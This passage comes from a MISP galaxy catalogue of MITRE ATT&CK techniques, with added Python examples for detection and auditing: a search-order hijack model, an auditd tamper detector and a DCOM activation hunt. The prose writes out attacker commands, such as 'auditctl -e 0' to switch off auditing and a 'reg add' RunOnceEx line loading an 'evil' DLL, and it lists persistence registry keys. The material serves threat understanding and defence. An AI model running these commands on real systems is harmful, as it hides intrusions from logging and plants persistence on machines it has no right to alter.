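The PATH case in T1574.007 and the search-order case in T1574.008 above are the same lookup seen from two angles. The following is an added example, not code from the MISP galaxy or from ATT&CK: a Python model of bare-name command resolution that searches directories in a caller-supplied order and, on Windows, tries every PATHEXT extension inside a directory before moving to the next one (which is why <code>net.com</code> beats <code>net.exe</code> in the same directory), plus a helper that lists the writable directories consulted before the legitimate binary's own. The search order is the caller's model of the launcher (cmd.exe looks in the current directory and then PATH; CreateProcess also checks the system directories before PATH, which this example leaves out), and all directory listings are constructed.

```python
"""Model bare-name command resolution and its hijack points (added example).

Directories are searched in the order given, and on Windows every PATHEXT
extension is tried inside a directory before the next directory is consulted.
The search order passed in is the caller's model of the launcher (cmd.exe:
current directory, then PATH; CreateProcess also checks the system directories
before PATH, omitted here). All directory listings are constructed.
"""

# Constructed view of the filesystem: directory -> names present in it.
LISTING = {
    "C:\\Program Files\\Example": {"example.exe", "net.com"},   # planted beside the caller (T1574.008)
    "C:\\example": {"net.exe"},                                  # user-writable dir early in PATH (T1574.007)
    "C:\\Windows\\System32": {"net.exe", "cmd.exe"},
    "/home/alice/.local/bin": {"sudo"},                          # attacker-controlled entry prepended to $PATH
    "/usr/bin": {"sudo", "ls"},
}
PATHEXT = (".COM", ".EXE", ".BAT", ".CMD")                        # default order on Windows
WIN_PATH = ["C:\\example", "C:\\Windows\\System32"]


def resolve(command, search_dirs, listing, pathext=(), sep="\\"):
    """Return the path the launcher would execute for `command`, or None.
    Windows (backslash separator) matching is case-insensitive; POSIX (slash) is exact."""
    fold = str.lower if sep == "\\" else (lambda s: s)
    candidates = [command]
    if pathext and "." not in command:          # bare name: try each extension in order
        candidates = [command + ext for ext in pathext]
    for directory in search_dirs:
        names = {fold(n): n for n in listing.get(directory, ())}
        for cand in candidates:
            if fold(cand) in names:
                return directory.rstrip(sep) + sep + names[fold(cand)]
    return None


def hijack_points(legit_path, search_dirs, writable_dirs, sep="\\"):
    """Directories consulted before the legitimate binary's own directory that the
    attacker can write to: each is a spot where a same-named file wins."""
    legit_dir = legit_path.rsplit(sep, 1)[0].lower()
    writable = {w.lower() for w in writable_dirs}
    points = []
    for directory in search_dirs:
        if directory.lower() == legit_dir:
            break
        if directory.lower() in writable:
            points.append(directory)
    return points


if __name__ == "__main__":
    app_dir = "C:\\Program Files\\Example"
    # cmd.exe started from the application's directory runs `net user`
    print(resolve("net", [app_dir] + WIN_PATH, LISTING, PATHEXT))
    # without the planted net.com the lookup still lands in C:\example via PATH
    print(resolve("net", WIN_PATH, LISTING, PATHEXT))
    print(hijack_points("C:\\Windows\\System32\\net.exe", [app_dir] + WIN_PATH, ["C:\\example"]))
    # the same logic on a POSIX host with an attacker-controlled PATH entry
    print(resolve("sudo", ["/home/alice/.local/bin", "/usr/bin"], LISTING, sep="/"))
```

Feeding <code>hijack_points</code> the real PATH and the set of directories the current user can write to (for example from <code>icacls</code> or <code>test -w</code>) is the audit a practitioner actually wants; the only robust fix on the calling side is to invoke programs by full path, which removes the search entirely.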

The tag is: misp-galaxy:mitre-attack-pattern="Path Interception by Search Order Hijacking - T1574.008"

Table 5358. Table References

Links

http://msdn.microsoft.com/en-us/library/ms682425

http://msdn.microsoft.com/en-us/library/ms687393

https://attack.mitre.org/techniques/T1574/008

https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120

https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN

Disable or Modify Linux Audit System - T1562.012

Adversaries may disable or modify the Linux audit system to hide malicious activity and avoid detection. Linux admins use the Linux Audit system to track security-relevant information on a system. The Linux Audit system operates at the kernel-level and maintains event logs on application and system activity such as process, network, file, and login events based on pre-configured rules.

The name auditd refers to the user-space daemon that writes events to disk; its behaviour is governed by the parameters in <code>/etc/audit/auditd.conf</code>. The two primary ways to configure the rules that generate events are the command-line <code>auditctl</code> utility and the file <code>/etc/audit/audit.rules</code> (assembled from <code>/etc/audit/rules.d/</code> by augenrules on current distributions), which contains a sequence of auditctl arguments loaded at boot.(Citation: Red Hat System Auditing)(Citation: IzyKnows auditd threat detection 2022)

With root privileges, adversaries may be able to ensure their activity is not logged by disabling the audit service, editing the configuration or rule files, or hooking the audit library functions. From the command line, adversaries can disable auditing by killing the auditd daemon's processes, using <code>systemctl</code> to stop the service, or running <code>auditctl -e 0</code>. Adversaries can also hook audit functions to disable logging, or modify the rules in <code>/etc/audit/audit.rules</code> or the settings in <code>auditd.conf</code> so that malicious activity is ignored.(Citation: Trustwave Honeypot SkidMap 2023)(Citation: ESET Ebury Feb 2014) Setting the audit configuration to immutable with <code>auditctl -e 2</code>, typically as the last line of the rules file, prevents rule changes until the next reboot and raises the cost of this technique.
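Each of the actions above leaves a record in the audit log itself before logging stops, which is the moment to alert on. The following is an added example, not code from the MISP galaxy, from ATT&CK or from the audit project: a parser for the kernel audit record format (<code>type=... msg=audit(ts:serial): key=value ...</code>, including the nested <code>msg='...'</code> block that user-space records carry) and a handful of rules matching auditing being switched off, a rule being removed, auditd being stopped or terminated, and the rule files being written (the last assumes a watch such as <code>-w /etc/audit/ -p wa -k audit-config</code> is loaded). The log lines are constructed; field names follow the audit record format, but exact fields vary between kernel and auditd versions.

```python
"""Flag audit-log records that show the audit system itself being tampered with (added example).

Parses lines in the kernel audit record format (`type=... msg=audit(ts:serial): k=v ...`,
with the nested msg='...' block user-space records carry) and matches the events
produced when auditing is switched off, rules are removed, auditd is stopped or
killed, or the rule files are written (the last assumes a watch like
`-w /etc/audit/ -p wa -k audit-config` is loaded). The log lines below are constructed.
"""
import re

HEADER = re.compile(r"^type=(?P<type>\w+) msg=audit\((?P<ts>\d+\.\d+):(?P<serial>\d+)\):\s*(?P<body>.*)$")
FIELD = re.compile(r"""(\w+)=('[^']*'|"[^"]*"|\S+)""")

SAMPLE_LOG = """\
type=SYSCALL msg=audit(1703170000.101:455): arch=c000003e syscall=257 success=yes exit=3 a0=ffffff9c a1=55d0c0a0 a2=241 a3=1b6 items=2 ppid=2311 pid=2340 auid=1000 uid=0 gid=0 euid=0 comm="vi" exe="/usr/bin/vi" key="audit-config"
type=PATH msg=audit(1703170000.101:455): item=1 name="/etc/audit/rules.d/audit.rules" inode=393231 dev=fd:00 mode=0100640 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fr=0
type=CONFIG_CHANGE msg=audit(1703170000.123:456): audit_enabled=0 old=1 auid=1000 ses=4 subj=unconfined res=1
type=CONFIG_CHANGE msg=audit(1703170000.125:457): auid=1000 ses=4 subj=unconfined op=remove_rule key="exec" list=4 res=1
type=SERVICE_STOP msg=audit(1703170001.100:459): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=unconfined msg='unit=auditd comm="systemd" exe="/usr/lib/systemd/systemd" hostname=? addr=? terminal=? res=success'
type=DAEMON_END msg=audit(1703170001.200:460): op=terminate auid=4294967295 pid=1 subj=unconfined res=success
type=USER_LOGIN msg=audit(1703170002.000:461): pid=2500 uid=0 auid=1000 ses=5 msg='op=login id=1000 exe="/usr/sbin/sshd" hostname=10.0.0.5 addr=10.0.0.5 terminal=/dev/pts/0 res=success'
"""


def _fields(text):
    """key=value pairs -> dict; a single-quoted value is a nested record body."""
    out = {}
    for key, value in FIELD.findall(text):
        if value.startswith("'") and value.endswith("'"):
            out.update(_fields(value[1:-1]))
        else:
            out[key] = value.strip('"')
    return out


def parse_record(line):
    """Return a flat dict for one audit record, or None if the line is not one."""
    m = HEADER.match(line.strip())
    if not m:
        return None
    rec = {"type": m["type"], "ts": float(m["ts"]), "serial": int(m["serial"])}
    rec.update(_fields(m["body"]))
    return rec


# (label, predicate) pairs; each predicate sees the flattened record.
RULES = [
    ("auditing disabled (auditctl -e 0)",
     lambda r: r["type"] == "CONFIG_CHANGE" and r.get("audit_enabled") == "0"),
    ("audit rule removed",
     lambda r: r["type"] == "CONFIG_CHANGE" and r.get("op") == "remove_rule"),
    ("auditd daemon terminated",
     lambda r: r["type"] == "DAEMON_END"),
    ("auditd unit stopped by systemd",
     lambda r: r["type"] == "SERVICE_STOP" and r.get("unit") == "auditd"),
    ("audit rule or config file written",
     lambda r: r["type"] == "PATH" and r.get("name", "").startswith("/etc/audit/")
               and r.get("nametype") in {"NORMAL", "CREATE", "DELETE"}),
]


def detect(lines):
    """Return (serial, label, auid, program) for every record that matches a rule."""
    hits = []
    for line in lines:
        rec = parse_record(line)
        if rec is None:
            continue
        for label, pred in RULES:
            if pred(rec):
                hits.append((rec["serial"], label, rec.get("auid"), rec.get("exe") or rec.get("comm")))
    return hits


if __name__ == "__main__":
    for serial, label, auid, prog in detect(SAMPLE_LOG.splitlines()):
        print(f"{serial}: {label} (auid={auid}, program={prog})")
```

Because these are the last records auditd writes before it stops, they only help if the log is shipped off the host promptly; the PATH hit carries no <code>exe</code> of its own and is joined to the SYSCALL record with the same serial (455 here) to learn which program wrote the file. A SIGKILL of auditd by a process other than systemd shows up as a <code>kill</code> syscall record if a rule for syscall <code>kill</code> is loaded, which this sample does not include.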

The tag is: misp-galaxy:mitre-attack-pattern="Disable or Modify Linux Audit System - T1562.012"

Table 5359. Table References

Links

https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing

https://attack.mitre.org/techniques/T1562/012

https://izyknows.medium.com/linux-auditd-for-threat-detection-d06c8b941505

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/honeypot-recon-new-variant-of-skidmap-targeting-redis/

https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/

Registry Run Keys / Startup Folder - T1060

Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account’s associated permissions level.

Placing a program within a startup folder will cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in.

The startup folder path for the current user is:

  • <code>C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup</code>

The startup folder path for all users is:

  • <code>C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp</code>

The following run keys are created by default on Windows systems:

  • <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run</code>

  • <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce</code>

  • <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run</code>

  • <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce</code>

The <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx</code> key is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: <code>reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll"</code> (Citation: Oddvar Moe RunOnceEx Mar 2018)

The following Registry keys can be used to set startup folder items for persistence:

  • <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders</code>

  • <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</code>

  • <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</code>

  • <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders</code>

The following Registry keys can control automatic startup of services during boot:

  • <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce</code>

  • <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce</code>

  • <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices</code>

  • <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices</code>

Using policy settings to specify startup programs creates corresponding values in either of two Registry keys:

  • <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</code>

  • <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</code>

The Winlogon key controls actions that occur when a user logs on to a computer running Windows. Most of these actions are under the control of the operating system, but custom actions can also be added here. The <code>Userinit</code> and <code>Shell</code> values under <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon</code> can automatically launch programs.

Programs listed in the <code>load</code> value of the registry key <code>HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows</code> run automatically for the currently logged-on user, since the key lives in that user's hive.

By default, the multistring <code>BootExecute</code> value of the registry key <code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager</code> is set to <code>autocheck autochk *</code>. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.

Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.

The tag is: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1060"

Table 5360. Table References

Links

http://msdn.microsoft.com/en-us/library/aa376977

https://attack.mitre.org/techniques/T1060

https://capec.mitre.org/data/definitions/270.html

https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/

https://support.microsoft.com/help/310593/description-of-the-runonceex-registry-key

https://technet.microsoft.com/en-us/sysinternals/bb963902

Exploit SS7 to Redirect Phone Calls/SMS - T1449

An adversary could exploit signaling system vulnerabilities to redirect calls or text messages (SMS) to a phone number under the attacker’s control. The adversary could then act as an adversary-in-the-middle to intercept or manipulate the communication. (Citation: Engel-SS7) (Citation: Engel-SS7-2008) (Citation: 3GPP-Security) (Citation: Positive-SS7) (Citation: CSRIC5-WG10-FinalReport) Interception of SMS messages could enable adversaries to obtain authentication codes used for multi-factor authentication(Citation: TheRegister-SS7).

The tag is: misp-galaxy:mitre-attack-pattern="Exploit SS7 to Redirect Phone Calls/SMS - T1449"

Table 5361. Table References

Links

http://www.3gpp.org/ftp/tsg_sa/wg3_security/_specs/33900-120.pdf

https://attack.mitre.org/techniques/T1449

https://berlin.ccc.de/tobias/31c3-ss7-locate-track-manipulate.pdf

https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-37.html

https://www.fcc.gov/files/csric5-wg10-finalreport031517pdf

https://www.ptsecurity.com/upload/ptcom/PT-SS7-AD-Data-Sheet-eng.pdf

https://www.theregister.co.uk/2017/05/03/hackers_fire_up_ss7_flaw/

https://www.youtube.com/watch?v=q0n5ySqbfdI

Assess security posture of physical locations - T1302

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1302).

Physical access may be required for certain types of adversarial actions. (Citation: CyberPhysicalAssessment) (Citation: CriticalInfrastructureAssessment)

The tag is: misp-galaxy:mitre-attack-pattern="Assess security posture of physical locations - T1302"

Table 5362. Table References

Links

https://attack.mitre.org/techniques/T1302

Determine domain and IP address space - T1250

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1250).

Domain Names are the human readable names used to represent one or more IP addresses. IP addresses are the unique identifier of computing devices on a network. Both pieces of information are valuable to an adversary who is looking to understand the structure of a network. (Citation: RSA-APTRecon)

The tag is: misp-galaxy:mitre-attack-pattern="Determine domain and IP address space - T1250"

Table 5363. Table References

Links

https://attack.mitre.org/techniques/T1250

Research visibility gap of security vendors - T1290

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1290).

If an adversary can identify which security tools a victim is using they may be able to identify ways around those tools. (Citation: CrowdStrike Putter Panda)

The tag is: misp-galaxy:mitre-attack-pattern="Research visibility gap of security vendors - T1290"

Table 5364. Table References

Links

http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf

https://attack.mitre.org/techniques/T1290

Exploit SS7 to Track Device Location - T1450

An adversary could exploit signaling system vulnerabilities to track the location of mobile devices. (Citation: Engel-SS7) (Citation: Engel-SS7-2008) (Citation: 3GPP-Security) (Citation: Positive-SS7) (Citation: CSRIC5-WG10-FinalReport)

The tag is: misp-galaxy:mitre-attack-pattern="Exploit SS7 to Track Device Location - T1450"

Table 5365. Table References

Links

http://www.3gpp.org/ftp/tsg_sa/wg3_security/_specs/33900-120.pdf

https://attack.mitre.org/techniques/T1450

https://berlin.ccc.de/tobias/31c3-ss7-locate-track-manipulate.pdf

https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-38.html

https://www.fcc.gov/files/csric5-wg10-finalreport031517pdf

https://www.ptsecurity.com/upload/ptcom/PT-SS7-AD-Data-Sheet-eng.pdf

https://www.youtube.com/watch?v=q0n5ySqbfdI

Access Sensitive Data in Device Logs - T1413

On versions of Android prior to 4.1, an adversary may use a malicious application that holds the READ_LOGS permission to obtain private keys, passwords, other credentials, or other sensitive data stored in the device’s system log. On Android 4.1 and later, an adversary would need to attempt to perform an operating system privilege escalation attack to be able to access the log.

The tag is: misp-galaxy:mitre-attack-pattern="Access Sensitive Data in Device Logs - T1413"

Table 5366. Table References

Links

https://attack.mitre.org/techniques/T1413

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-3.html

Stolen Developer Credentials or Signing Keys - T1441

An adversary could steal developer account credentials on an app store and/or signing keys to publish malicious updates to existing Android or iOS apps, or to abuse the developer’s identity and reputation to publish new malicious applications. Infoworld describes this technique and suggests mitigations. (Citation: Infoworld-Appstore)

Detection: Developers can regularly scan (or have a third party scan on their behalf) the app stores for presence of unauthorized apps that were submitted using the developer’s identity.

Platforms: Android, iOS

The tag is: misp-galaxy:mitre-attack-pattern="Stolen Developer Credentials or Signing Keys - T1441"

Stolen Developer Credentials or Signing Keys - T1441 has relationships with:

  • revoked-by: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Authorized App Store - T1475" with estimative-language:likelihood-probability="almost-certain"

Table 5367. Table References

Links

https://attack.mitre.org/techniques/T1441

Component Object Model and Distributed COM - T1175

This technique has been deprecated. Please use [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) and [Component Object Model](https://attack.mitre.org/techniques/T1559/001).

Adversaries may use the Windows Component Object Model (COM) and Distributed Component Object Model (DCOM) for local code execution or to execute on remote systems as part of lateral movement.

COM is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) DCOM is transparent middleware that extends the functionality of Component Object Model (COM) (Citation: Microsoft COM) beyond a local computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)

Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry. (Citation: Microsoft COM ACL)(Citation: Microsoft Process Wide Com Keys)(Citation: Microsoft System Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.

Adversaries may abuse COM for local command and/or payload execution. Various COM interfaces are exposed that can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java, and VBScript.(Citation: Microsoft COM) Specific COM objects also exist to directly perform functions beyond code execution, such as creating a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), fileless download/execution, and other adversary behaviors such as Privilege Escalation and Persistence.(Citation: Fireeye Hunting COM June 2019)(Citation: ProjectZero File Write EoP Apr 2018)

Adversaries may use DCOM for lateral movement. Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications (Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents (Citation: Enigma Excel DCOM Sept 2017) and may also invoke [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1173) (DDE) execution directly through a COM created instance of a Microsoft Office application (Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document.
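A detection-side illustration, added here and not taken from ATT&CK, MISP or the cited write-ups: both local out-of-process COM activation and remote DCOM activation start the server application under the DcomLaunch service host, so an Office or MMC process whose parent is svchost.exe -k DcomLaunch is the thing to hunt on. The event field names, the sample records and the list of abused binaries are assumptions constructed for the demo.

```python
"""Hunt for Office/MMC processes started by the DCOM launch service host.

Added example (not ATT&CK or MISP code). Input records are constructed
Sysmon-style process-creation events; the field names are an assumption."""

# Binaries behind the ProgIDs used in the cited blogs (MMC20.Application,
# Excel.Application, Outlook.Application). Assumed list, extend as needed.
DCOM_HOSTED_BINARIES = {"mmc.exe", "excel.exe", "outlook.exe", "winword.exe", "powerpnt.exe"}

SAMPLE_EVENTS = [  # constructed, not from any real host
    {"host": "WS01", "user": r"CORP\jdoe",
     "image": r"C:\Windows\System32\mmc.exe",
     "parent_image": r"C:\Windows\System32\svchost.exe",
     "parent_cmdline": r"C:\Windows\system32\svchost.exe -k DcomLaunch -p"},
    {"host": "WS01", "user": r"CORP\jdoe",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "parent_image": r"C:\Windows\explorer.exe",
     "parent_cmdline": r"C:\Windows\Explorer.EXE"},
    {"host": "WS02", "user": r"CORP\svc_backup",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "parent_image": r"C:\Windows\System32\svchost.exe",
     "parent_cmdline": r"C:\Windows\system32\svchost.exe -k DcomLaunch -p"},
    {"host": "WS02", "user": r"NT AUTHORITY\SYSTEM",
     "image": r"C:\Windows\System32\wuauclt.exe",
     "parent_image": r"C:\Windows\System32\svchost.exe",
     "parent_cmdline": r"C:\Windows\system32\svchost.exe -k netsvcs -p"},
]


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_dcom_activation(event):
    """True when a DCOM-exposed application is spawned by the DcomLaunch service host.
    Interactive launches (parent explorer.exe) and other svchost groups do not match."""
    return (basename(event["image"]) in DCOM_HOSTED_BINARIES
            and basename(event["parent_image"]) == "svchost.exe"
            and "dcomlaunch" in event["parent_cmdline"].lower())


def find_dcom_activations(events):
    """Return (host, user, image) for every event that matches the heuristic."""
    return [(e["host"], e["user"], basename(e["image"]))
            for e in events if is_dcom_activation(e)]


if __name__ == "__main__":
    for host, user, image in find_dcom_activations(SAMPLE_EVENTS):
        print(f"{host}: {image} activated via DcomLaunch as {user}")
```

The heuristic on its own also fires on legitimate local automation (a script instantiating Excel.Application locally goes through the same service host), so pair each hit with a type 3 network logon for that user on that host within the preceding seconds to separate lateral movement from local scripting.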

The tag is: misp-galaxy:mitre-attack-pattern="Component Object Model and Distributed COM - T1175"

Table 5368. Table References

Links

https://attack.mitre.org/techniques/T1175

https://docs.microsoft.com/en-us/windows/desktop/com/dcom-security-enhancements-in-windows-xp-service-pack-2-and-windows-server-2003-service-pack-1

https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/

https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/

https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/

https://enigma0x3.net/2017/11/16/lateral-movement-using-outlooks-createobject-method-and-dotnettojscript/

https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html

https://msdn.microsoft.com/en-us/library/windows/desktop/ms687317(v=vs.85).aspx

https://msdn.microsoft.com/en-us/library/windows/desktop/ms694331(v=vs.85).aspx

https://msdn.microsoft.com/library/windows/desktop/ms680573.aspx

https://www.cybereason.com/blog/leveraging-excel-dde-for-lateral-movement-via-dcom

https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html

Develop social network persona digital footprint - T1342

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1342).

Both newly built personas and pre-compromised personas may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos. (Citation: NEWSCASTER2014) (Citation: BlackHatRobinSage) (Citation: RobinSageInterview)

The tag is: misp-galaxy:mitre-attack-pattern="Develop social network persona digital footprint - T1342"

Table 5369. Table References

Links

http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf

https://attack.mitre.org/techniques/T1342

https://www.securityweek.com/iranian-hackers-targeted-us-officials-elaborate-social-media-attack-operation

Assess vulnerability of 3rd party vendors - T1298

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1298).

Once a 3rd party vendor has been identified as being of interest it can be probed for vulnerabilities just like the main target would be. (Citation: Zetter2015Threats) (Citation: WSJTargetBreach)

The tag is: misp-galaxy:mitre-attack-pattern="Assess vulnerability of 3rd party vendors - T1298"

Table 5370. Table References

Links

https://attack.mitre.org/techniques/T1298

Manipulate App Store Rankings or Ratings - T1452

An adversary could use access to a compromised device’s credentials to attempt to manipulate app store rankings or ratings by triggering application downloads or posting fake reviews of applications. This technique likely requires privileged access (a rooted or jailbroken device).

The tag is: misp-galaxy:mitre-attack-pattern="Manipulate App Store Rankings or Ratings - T1452"

Table 5371. Table References

Links

https://attack.mitre.org/techniques/T1452

Acquire OSINT data sets and information - T1247

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1247).

Open source intelligence (OSINT) is intelligence gathered from publicly available sources. This can include both information gathered on-line, such as from search engines, as well as in the physical world. (Citation: RSA-APTRecon)

The tag is: misp-galaxy:mitre-attack-pattern="Acquire OSINT data sets and information - T1247"

Acquire OSINT data sets and information - T1247 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Acquire OSINT data sets and information - T1266" with estimative-language:likelihood-probability="almost-certain"

Table 5372. Table References

Links

https://attack.mitre.org/techniques/T1247

Acquire OSINT data sets and information - T1266

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1266).

Open source intelligence (OSINT) provides free, readily available information about a target while providing the target no indication they are of interest. Such information can assist an adversary in crafting a successful approach for compromise. (Citation: RSA-APTRecon)

The tag is: misp-galaxy:mitre-attack-pattern="Acquire OSINT data sets and information - T1266"

Acquire OSINT data sets and information - T1266 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Acquire OSINT data sets and information - T1277" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Acquire OSINT data sets and information - T1247" with estimative-language:likelihood-probability="almost-certain"

Table 5373. Table References

Links

https://attack.mitre.org/techniques/T1266

Acquire OSINT data sets and information - T1277

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1277).

Data sets can be anything from Securities and Exchange Commission (SEC) filings to public phone numbers. Many datasets are now either publicly available for free or can be purchased from a variety of data vendors. Open source intelligence (OSINT) is intelligence gathered from publicly available sources. This can include both information gathered on-line as well as in the physical world. (Citation: SANSThreatProfile) (Citation: Infosec-osint) (Citation: isight-osint)

The tag is: misp-galaxy:mitre-attack-pattern="Acquire OSINT data sets and information - T1277"

Acquire OSINT data sets and information - T1277 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Acquire OSINT data sets and information - T1266" with estimative-language:likelihood-probability="almost-certain"

Table 5374. Table References

Links

https://attack.mitre.org/techniques/T1277

Assess opportunities created by business deals - T1299

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1299).

During mergers, divestitures, or other periods of change in joint infrastructure or business processes, there may be an opportunity for exploitation. During this type of churn, unusual requests or other non-standard practices may not be as noticeable. (Citation: RossiMergers) (Citation: MeidlHealthMergers)

The tag is: misp-galaxy:mitre-attack-pattern="Assess opportunities created by business deals - T1299"

Table 5375. Table References

Links

https://attack.mitre.org/techniques/T1299

SSL certificate acquisition for trust breaking - T1338

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1338).

Fake certificates can be acquired by legal process or coercion, or an adversary can trick a Certificate Authority into issuing a certificate. These fake certificates can be used as part of Man-in-the-Middle attacks. (Citation: SubvertSSL)

